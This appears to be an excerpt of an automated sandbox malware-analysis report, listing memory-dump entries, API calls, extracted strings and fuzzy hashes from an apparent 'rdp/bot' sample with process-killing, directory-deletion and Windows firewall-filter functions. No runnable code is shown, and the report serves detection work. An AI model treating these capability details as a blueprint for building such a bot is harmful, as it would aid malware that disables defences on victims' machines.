                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fflushfwriteinet_addrntohl
                                    • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
                                    • API String ID: 3255839625-58178811
                                    • Opcode ID: d256b7c3bfc4f1f46297c99cf1b9fdebdcffbd4f8ce2096f4faa639793330bd3
                                    • Instruction ID: 320310c588b5db09f0f7c461fb3c39f18bd4d89c4e45e8ee039349e5e06301e1
                                    • Opcode Fuzzy Hash: d256b7c3bfc4f1f46297c99cf1b9fdebdcffbd4f8ce2096f4faa639793330bd3
                                    • Instruction Fuzzy Hash: 8D51803260CBC585E7719B25B4403EABBA5EB95780F804135D6CC8BBA9EF3CC195CB51
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID:
                                    • API String ID: 2086374402-0
                                    • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                    • Instruction ID: cfcbb3ba5b7a0e136df41fa1d0280e11c419cfaa570f2a9aadf04900064033f0
                                    • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                    • Instruction Fuzzy Hash: 64E022A272880583EF60D60AE4407BBAB91C79C394F904130E91EC3BA4DA3CD9628B40
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 253c9fb1a9a9a6b2d406ad64c93e81b9ce91d3770f92f8c83c255d7155b27596
                                    • Instruction ID: 83022f27c5258dec9e13d66f02c86ce9599dcbc6cd02bdbfde3fdbf6332d44db
                                    • Opcode Fuzzy Hash: 253c9fb1a9a9a6b2d406ad64c93e81b9ce91d3770f92f8c83c255d7155b27596
                                    • Instruction Fuzzy Hash: A5415D97D8EAC54AF7D26D784D7E2386FD0ABA17007CD807BC344566E3AA69E8144333
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                                    • Instruction ID: 44d23ee426d279dbe13ab575164d5b70112a49102c2eba2da26862a72092d275
                                    • Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                                    • Instruction Fuzzy Hash: 8EA002129CDC0AC4EA881F00E811271A96CEB06700FC42131C128620A58B3CD0108115
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                                    • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                                    • API String ID: 3326156344-4160762685
                                    • Opcode ID: ddae266145e06ba45a32dd147251454c87ade30978731ea112754126fa238577
                                    • Instruction ID: e41e3bd26dfa1e9fe1c7803aa0bcc312d4c53722c580a96036ae004f9d412b0a
                                    • Opcode Fuzzy Hash: ddae266145e06ba45a32dd147251454c87ade30978731ea112754126fa238577
                                    • Instruction Fuzzy Hash: 42F12256E8C30782FAF47656A890378DB50AF14754ED01233C61EA62F1DE7DED85B223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                    • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                    • API String ID: 2460052984-4087913290
                                    • Opcode ID: f49021cfd17e5645a415218e2337d23fcbe7ef664cc3b0d8083bd933364814f5
                                    • Instruction ID: c8a3f68bd27fadacc3b542ac766d039c81c0e4bd666c64ae5c69eadf6889cbc1
                                    • Opcode Fuzzy Hash: f49021cfd17e5645a415218e2337d23fcbe7ef664cc3b0d8083bd933364814f5
                                    • Instruction Fuzzy Hash: 6FA1C52198C68285F6A0BB06E9203F9EBA1AF80745FD40133D50EA76F5DF3DE5099763
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strlen$strcatstrcpy$strcmp
                                    • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                    • API String ID: 2140730755-3699962909
                                    • Opcode ID: 53b4bd48d3555066442ddf4302ded71f9d2e6007b6eed7bc00e144543ebe8498
                                    • Instruction ID: a26a8a93c41bae9876591207930fc4958c86e9d6378888076e63c41c64326109
                                    • Opcode Fuzzy Hash: 53b4bd48d3555066442ddf4302ded71f9d2e6007b6eed7bc00e144543ebe8498
                                    • Instruction Fuzzy Hash: 18C1F76298C68681F6B0B702E5503F9EBA1AF44784FC40133DA4EA66E5DF7CE509D723
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                                    • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                                    • API String ID: 3826151639-1775164968
                                    • Opcode ID: a6c61a1b07e674b01c5ec014d58fb88dea4969261ebe8cbd2533bfbf6d8bc1e9
                                    • Instruction ID: afef5c8074e25bc2af6f27f5085256f4b500ab6aa4a0649f7ce404704bfb60a8
                                    • Opcode Fuzzy Hash: a6c61a1b07e674b01c5ec014d58fb88dea4969261ebe8cbd2533bfbf6d8bc1e9
                                    • Instruction Fuzzy Hash: C9919322E8C54285FAE07706E46437CDA92AF84795FD50233D50EA72F1DE3CE895A363
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
                                    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                                    • API String ID: 3629392964-1470975255
                                    • Opcode ID: 97da833c0286c23491248727b5f9ff6699206188f68b1a177a93830b109ce109
                                    • Instruction ID: ba05bb65a7195d49c129bfff6b0fcf8c2f3e5f1a54118f851d86376db1fcd773
                                    • Opcode Fuzzy Hash: 97da833c0286c23491248727b5f9ff6699206188f68b1a177a93830b109ce109
                                    • Instruction Fuzzy Hash: E3A1B33260D7C285E7A0AB15B4403AABBA5FB81780F444135EACD5BBA9DF3DC094CB52
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                                    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                                    • API String ID: 2990311666-1793103013
                                    • Opcode ID: 2c997fc73ab919394416098a8c18d9cb1dd8f1079b30a699f2a821e8dd8f435d
                                    • Instruction ID: 968f9d12f27caeaf686b76f8bda436be45bd93364f323d8432a2463a1eebdede
                                    • Opcode Fuzzy Hash: 2c997fc73ab919394416098a8c18d9cb1dd8f1079b30a699f2a821e8dd8f435d
                                    • Instruction Fuzzy Hash: 8C91C52264DBC285E7A1EB15A4403AABBA1FB81740F444135EBCC5BBA9EF3DC155CB12
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                    • API String ID: 1104438493-1059260517
                                    • Opcode ID: 8777b3765a0b61160c2dd5586f2618d65661b4ac38adbf88f21a5bf13e2edb7f
                                    • Instruction ID: c72e46d8a4a34e6a7cca514b32907bdf5f66c92ba37c0f10bbf1efd18d4dee71
                                    • Opcode Fuzzy Hash: 8777b3765a0b61160c2dd5586f2618d65661b4ac38adbf88f21a5bf13e2edb7f
                                    • Instruction Fuzzy Hash: CD719252E8C24392FBE17B16E8507B99A91AF54744FD41233CA0DA66F1DE3CE845A323
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                                    • API String ID: 1879646588-710610406
                                    • Opcode ID: 1ab2c9bf8f2caa541bedd61938cb30dfc0d099194f247efb2808cbd3032f71e4
                                    • Instruction ID: c3883ac351e45243b6d3a7e841fb9673442fe242d36f91f616f0b3524876a6e1
                                    • Opcode Fuzzy Hash: 1ab2c9bf8f2caa541bedd61938cb30dfc0d099194f247efb2808cbd3032f71e4
                                    • Instruction Fuzzy Hash: C9812E62E8C51782FAE2BA169450778EE906B00754FD54273C85EB72F09E3CFC46A763
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                    • API String ID: 1799206407-3397184676
                                    • Opcode ID: e21be7be9c16bb27528b034fe24b15d1ab511b8e353f145966fad9062a5d5940
                                    • Instruction ID: c1b4567ab3d2f8a424251710003a595a842639a2912abc604f7d1ff7ee10bda0
                                    • Opcode Fuzzy Hash: e21be7be9c16bb27528b034fe24b15d1ab511b8e353f145966fad9062a5d5940
                                    • Instruction Fuzzy Hash: 5C5151A198C64791F7A0B742A490374EE506F00B94ED40233C95EA66F4EE7CF597A323
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                    • API String ID: 1721699506-2819899730
                                    • Opcode ID: 9249b8ac11bf0b6892439467737feea6e33b7a6a6b97775ca93be675124264c7
                                    • Instruction ID: 81401b5430ff75bafab8772bc7dce1241d93df3f3324ce809a4c703bd38c9cce
                                    • Opcode Fuzzy Hash: 9249b8ac11bf0b6892439467737feea6e33b7a6a6b97775ca93be675124264c7
                                    • Instruction Fuzzy Hash: 53619262E9C54791FAB0BB15E8103B8AA916F40344FD64233C50DA76F1DE3CE966D327
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                    • API String ID: 39653677-3302659514
                                    • Opcode ID: a091d92821b1e82cfa39aaab01c8d8141344e235231bbb2c2f7fd8d648b90f23
                                    • Instruction ID: ef08d0ee97b4e970592b785ae8311a5266c4d03fcf26958f3ad648932437181a
                                    • Opcode Fuzzy Hash: a091d92821b1e82cfa39aaab01c8d8141344e235231bbb2c2f7fd8d648b90f23
                                    • Instruction Fuzzy Hash: 56416161A9C54390FAA0BB51E8203B89F91BF40744FD94233D54D6B2F5DF3CE926A322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
